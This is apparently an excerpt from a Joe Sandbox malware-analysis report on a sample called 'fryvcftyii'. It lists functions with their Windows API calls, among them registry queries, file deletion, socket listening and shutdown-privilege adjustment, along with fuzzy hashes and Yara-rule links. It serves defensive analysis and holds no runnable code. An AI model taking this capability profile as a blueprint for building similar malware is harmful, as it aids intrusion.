                            • Instruction ID: c4cab3d62ae0acb2011e75e23b11e04dd81113d3856a91b258272f9f91f90c62
                            • Opcode Fuzzy Hash: 83c383afdd59836301164d29e6aaa51267237924ee8d97763e13d170fbe8bc85
                            • Instruction Fuzzy Hash: 9651FD20B047A829FB35D7A0A8547ABBFF49F01380F88459F85C1572C3DA6C9B8CC769
                            Function 004403DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00440E1A: CharUpperBuffW.USER32(?,?), ref: 00440E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004404AC
                              • Part of subcall function 003C9837: __itow.LIBCMT ref: 003C9862
                              • Part of subcall function 003C9837: __swprintf.LIBCMT ref: 003C98AC
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0044054B
                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004405E3
                            • RegCloseKey.ADVAPI32(000000FE), ref: 00440822
                            • RegCloseKey.ADVAPI32(00000000), ref: 0044082F
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                            • String ID:
                            • API String ID: 1240663315-0
                            • Opcode ID: c7d2167169f1b16bf7520d08adbeb9ae65d9065b9536a6908ed72fc08b7384ec
                            • Instruction ID: c52401998761ff3832422955c75091e2014acbd2b300c831c7afeb3a20a5057b
                            • Opcode Fuzzy Hash: c7d2167169f1b16bf7520d08adbeb9ae65d9065b9536a6908ed72fc08b7384ec
                            • Instruction Fuzzy Hash: 39E17D31204200AFDB15DF28C885E2BBBE5FF89314F05856EF94ADB261DA34ED15CB96
                            Function 00434164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                            • String ID:
                            • API String ID: 1737998785-0
                            • Opcode ID: b2e92cd0d7e94a240988ceac360604447744ddfe6c78d9de0b06e610648a194d
                            • Instruction ID: a05bd03f37bae30511ff8d3213fc9bcb0df6182574c8092b9e2ca07b2f0643e3
                            • Opcode Fuzzy Hash: b2e92cd0d7e94a240988ceac360604447744ddfe6c78d9de0b06e610648a194d
                            • Instruction Fuzzy Hash: CA21D3392006109FDB01AF20EC09BAE7BA8FF49750F11806AF945DB3A1DB74AC41CB59
                            Function 004237EF Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 004238A3
                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0042394B
                            • MoveFileW.KERNEL32 ref: 0042395E
                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0042397B
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0042399D
                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 004239B9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                            • String ID: \*.*
                            • API String ID: 4002782344-1173974218
                            • Opcode ID: 76aff9a668b6ffd2c93eef1d1f3c3587347a01fdda080a4fa20a86016b878f4d
                            • Instruction ID: d80707aedc43700b4d20d4b1b18704aa05309b12cf1f9a041f7dc6fb87d2c907
                            • Opcode Fuzzy Hash: 76aff9a668b6ffd2c93eef1d1f3c3587347a01fdda080a4fa20a86016b878f4d
                            • Instruction Fuzzy Hash: 7051B37190015C9ACF12EFA0D952EEEB779AF15301FA000AEE802BB191DF396F49CB54
                            Function 0042F3F3 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0042F440
                            • Sleep.KERNEL32(0000000A), ref: 0042F470
                            • _wcscmp.LIBCMT ref: 0042F484
                            • _wcscmp.LIBCMT ref: 0042F49F
                            • FindNextFileW.KERNEL32(?,?), ref: 0042F53D
                            • FindClose.KERNEL32(00000000), ref: 0042F553
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                            • String ID: *.*
                            • API String ID: 713712311-438819550
                            • Opcode ID: 7f970f32c639d1c501dacafc209e44f87ed1037a45efeee3d477a98108067c42
                            • Instruction ID: 29953b1e9b9bee43e1abbe03e015557b0691a928a64fe3fc63fc690f6caf5bd6
                            • Opcode Fuzzy Hash: 7f970f32c639d1c501dacafc209e44f87ed1037a45efeee3d477a98108067c42
                            • Instruction Fuzzy Hash: 93417D7190022AABCF11DF64DC49AEEBBB4FF15310F90417AE815A7291DB349E89CF54
                            Function 003D3030 Relevance: 11.1, APIs: 4, Strings: 2, Instructions: 587COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: __itow__swprintf
                            • String ID: 3c=$_=
                            • API String ID: 674341424-3170935384
                            • Opcode ID: e208f1ad5dd53972e8a1db9feafc956848ec758d02b60d0350f80f6e1bc0b484
                            • Instruction ID: 32f2ad5de5588279761903429b399ca8e097328ec218085e7ab9294d06856bc5
                            • Opcode Fuzzy Hash: e208f1ad5dd53972e8a1db9feafc956848ec758d02b60d0350f80f6e1bc0b484
                            • Instruction Fuzzy Hash: FA227C726083019FD716DF24D881B6AB7E4AF84314F01492EF89A9B391DB75EE44CB93
                            Function 003D5760 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 4bd08d8e7ca52604f0369fb616c17e7b8892979e5f700a938ddbf4867be78f67
                            • Instruction ID: 99c299d71a1a2df665c6e2dac84610f1c818eb1162bbe9a7caa68dac3fd8a26d
                            • Opcode Fuzzy Hash: 4bd08d8e7ca52604f0369fb616c17e7b8892979e5f700a938ddbf4867be78f67
                            • Instruction Fuzzy Hash: D0129C71A00619EFDF05DFA5D981AEEB7B5FF48300F10452AE406EB290EB79AD90CB54
                            Function 00423B12 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C4743,?,?,003C37AE,?), ref: 003C4770
                              • Part of subcall function 00424A31: GetFileAttributesW.KERNEL32(?,0042370B), ref: 00424A32
                            • FindFirstFileW.KERNEL32(?,?), ref: 00423B89
                            • DeleteFileW.KERNEL32(?,?,?,?), ref: 00423BD9
                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00423BEA
                            • FindClose.KERNEL32(00000000), ref: 00423C01
                            • FindClose.KERNEL32(00000000), ref: 00423C0A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                            • String ID: \*.*
                            • API String ID: 2649000838-1173974218
                            • Opcode ID: 162258de7187f8bc99a30acc20ffdf28c1b32d363a0fa555c77a524ba14b5027
                            • Instruction ID: dda62705b1a3b820272c63a5e9192ad5e424e2d9b28e034ce9836a13584481a8
                            • Opcode Fuzzy Hash: 162258de7187f8bc99a30acc20ffdf28c1b32d363a0fa555c77a524ba14b5027
                            • Instruction Fuzzy Hash: EC31A1310083959BC201EF24D891DAFBBB8BE95315F804D2EF8D5C6192EB259E09CB5B
                            Function 004251BD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 004187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0041882B
                              • Part of subcall function 004187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00418858
                              • Part of subcall function 004187E1: GetLastError.KERNEL32 ref: 00418865
                            • ExitWindowsEx.USER32(?,00000000), ref: 004251F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                            • String ID: $@$SeShutdownPrivilege
                            • API String ID: 2234035333-194228
                            • Opcode ID: ee244e3b4cc05804fdcd9ea8ccecd108f66197596311f8b378c31905cbad343a
                            • Instruction ID: 201cbc8fffd34e6c0922598cb9b205a4e2a2942e2fd65c5a1285ee2a3ba6640e
                            • Opcode Fuzzy Hash: ee244e3b4cc05804fdcd9ea8ccecd108f66197596311f8b378c31905cbad343a
                            • Instruction Fuzzy Hash: B7014C35791631BBE7282364BC4AFB7B258AB05340FA008B7F903E21C2DE795C0189BD
                            Function 00436283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004362DC
                            • WSAGetLastError.WSOCK32(00000000), ref: 004362EB
                            • bind.WSOCK32(00000000,?,00000010), ref: 00436307
                            • listen.WSOCK32(00000000,00000005), ref: 00436316
                            • WSAGetLastError.WSOCK32(00000000), ref: 00436330
                            • closesocket.WSOCK32(00000000,00000000), ref: 00436344
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketlistensocket
                            • String ID:
                            • API String ID: 1279440585-0
                            • Opcode ID: a06ad87296538066bc68b654dd8d62f56ff6169989fa13d579eab65be0d77934
                            • Instruction ID: 29cd39c05c324f77110ad227200022e8818a47d6fb249c1a046064745a7bb93c
                            • Opcode Fuzzy Hash: a06ad87296538066bc68b654dd8d62f56ff6169989fa13d579eab65be0d77934
                            • Instruction Fuzzy Hash: 3721D035600201AFCB10EF64C849F6EB7A9EF49720F16816EEC16EB391CB74AC05CB65
                            Function 003D5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003E0DB6: std::exception::exception.LIBCMT ref: 003E0DEC
                              • Part of subcall function 003E0DB6: __CxxThrowException@8.LIBCMT ref: 003E0E01
                            • _memmove.LIBCMT ref: 00410258
                            • _memmove.LIBCMT ref: 0041036D
                            • _memmove.LIBCMT ref: 00410414
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID:
                            • API String ID: 1300846289-0
                            • Opcode ID: 726371fd52dc8a4c35a573412e9583fcbea1914d78a227720a96ecb729a1dd94
                            • Instruction ID: c0b294884889f3b8f4a4df0d2d1b1b3ed860732ccb304928a0a85488e0673f49
                            • Opcode Fuzzy Hash: 726371fd52dc8a4c35a573412e9583fcbea1914d78a227720a96ecb729a1dd94
                            • Instruction Fuzzy Hash: 9502CF71A00219EBCF05DF65D981AAE7BB5EF44300F14806AE80ADF391EB75DE90CB95
                            Function 003C1287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 003C19FA
                            • GetSysColor.USER32(0000000F,?,?), ref: 003C1A4E
                            • SetBkColor.GDI32(?,00000000), ref: 003C1A61
                              • Part of subcall function 003C1290: DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ColorProc$LongWindow
                            • String ID:
                            • API String ID: 3744519093-0
                            • Opcode ID: b3d5a8eaa5e68bd530d99800805157d323d54c917cde82368890072c6100e761
                            • Instruction ID: 2e12ffc37e8ccb8b1e6ac187186c321b294f7bd5026ec19d4e2e9d3f18e3129b
                            • Opcode Fuzzy Hash: b3d5a8eaa5e68bd530d99800805157d323d54c917cde82368890072c6100e761
                            • Instruction Fuzzy Hash: 66A187B4102548BAEA2BAB298C44F7F655CDF43385F16011EF603D6593CB24DD01B7BA
                            Function 00436747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00437D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00437DB6
                            • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0043679E
                            • WSAGetLastError.WSOCK32(00000000), ref: 004367C7
                            • bind.WSOCK32(00000000,?,00000010), ref: 00436800
                            • WSAGetLastError.WSOCK32(00000000), ref: 0043680D
                            • closesocket.WSOCK32(00000000,00000000), ref: 00436821
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                            • String ID:
                            • API String ID: 99427753-0
                            • Opcode ID: d713c67117209a93eea135df75cb535a6ddfc7e205a8a3732604dc68a762e152
                            • Instruction ID: b3a81c7828794ad2c82e526301919c5b564fdcba8f03cca6e1c2f542a035ef74
                            • Opcode Fuzzy Hash: d713c67117209a93eea135df75cb535a6ddfc7e205a8a3732604dc68a762e152
                            • Instruction Fuzzy Hash: FD41C275A00210AFDB11BF248C8AF6E77E8AB49714F45846EF91AEF3C2CA749D018795
                            Function 00445376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                            • String ID:
                            • API String ID: 292994002-0
                            • Opcode ID: 914d9c28c51e151c01eab7845c9cba07681f7528dd1576dfa37b298c45326310
                            • Instruction ID: ad3893cedc84da42f9f1020659b0605514b295b56a3d40b69ba0af4ac81d1f74
                            • Opcode Fuzzy Hash: 914d9c28c51e151c01eab7845c9cba07681f7528dd1576dfa37b298c45326310
                            • Instruction Fuzzy Hash: 101186317005116FFB215F269C44B5FBB99EF457A1B41443AFC45D7242CB78DD028699
                            Function 004180A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004180C0
                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004180CA
                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004180D9
                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004180E0
                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004180F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: HeapInformationToken$AllocErrorLastProcess
                            • String ID:
                            • API String ID: 44706859-0
                            • Opcode ID: a095c9992b7d6eaf5660ae5deb6ea869aa2de7c8a825112fd9e79de243267c56
                            • Instruction ID: b2384ed3528d2471e0960ca80f51c74fb41d68a398d7f561938aa4eaa58ae7c8
                            • Opcode Fuzzy Hash: a095c9992b7d6eaf5660ae5deb6ea869aa2de7c8a825112fd9e79de243267c56
                            • Instruction Fuzzy Hash: 30F06235240214BFEB200FA5EC8DEA73BACEF8A755B00003AF945D6250CB659C45DA64
                            Function 0042C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                            Download Yara Rule
                            APIs
                            • CoInitialize.OLE32(00000000), ref: 0042C432
                            • CoCreateInstance.OLE32(00452D6C,00000000,00000001,00452BDC,?), ref: 0042C44A
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • CoUninitialize.OLE32 ref: 0042C6B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: CreateInitializeInstanceUninitialize_memmove
                            • String ID: .lnk
                            • API String ID: 2683427295-24824748
                            • Opcode ID: 2bd777242de29a98972782e58d45867e98a9419b252aa314679241cd3d5b9496
                            • Instruction ID: 58a4bdc1fccc0f208440ea2257a1047d8957dcf2a9c15cbbf27942c777d72dbc
                            • Opcode Fuzzy Hash: 2bd777242de29a98972782e58d45867e98a9419b252aa314679241cd3d5b9496
                            • Instruction Fuzzy Hash: CEA14B72104205AFD301EF64C885EABB7E8EF89354F00496DF555CB192DB71EE49CB52
                            Function 003C4B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNEL32(kernel32.dll), ref: 003C4B45
                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,003C4AD0), ref: 003C4B57
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.478334161.00000000003C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003C0000, based on PE: true
                            • Associated: 00000005.00000002.478331139.00000000003C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478349085.0000000000474000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478373915.000000000047E000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.478381605.0000000000487000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_3c0000_fryvcftyii.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetNativeSystemInfo$kernel32.dll
                            • API String ID: 2574300362-192647395
                            • Opcode ID: 85078c74e7855794603d4fa83342297917120f5915deb579725a3593f08702f7
                            • Instruction ID: 5102912bd5c2c3d542805588bfd6fa89cf9f3501ff1ce78a93538375fb810ab1
                            • Opcode Fuzzy Hash: 85078c74e7855794603d4fa83342297917120f5915deb579725a3593f08702f7
                            • Instruction Fuzzy Hash: 75D01274A10713CFDB209F31D828F4676E4AF06391B21883E94C5D6550D674EC84C758
                            Function 0043EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32 ref: 0043EE3D
                            • Process32FirstW.KERNEL32(00000000,?), ref: 0043EE4B
                              • Part of subcall function 003C7DE1: _memmove.LIBCMT ref: 003C7E22
                            • Process32NextW.KERNEL32(00000000,?), ref: 0043EF0B
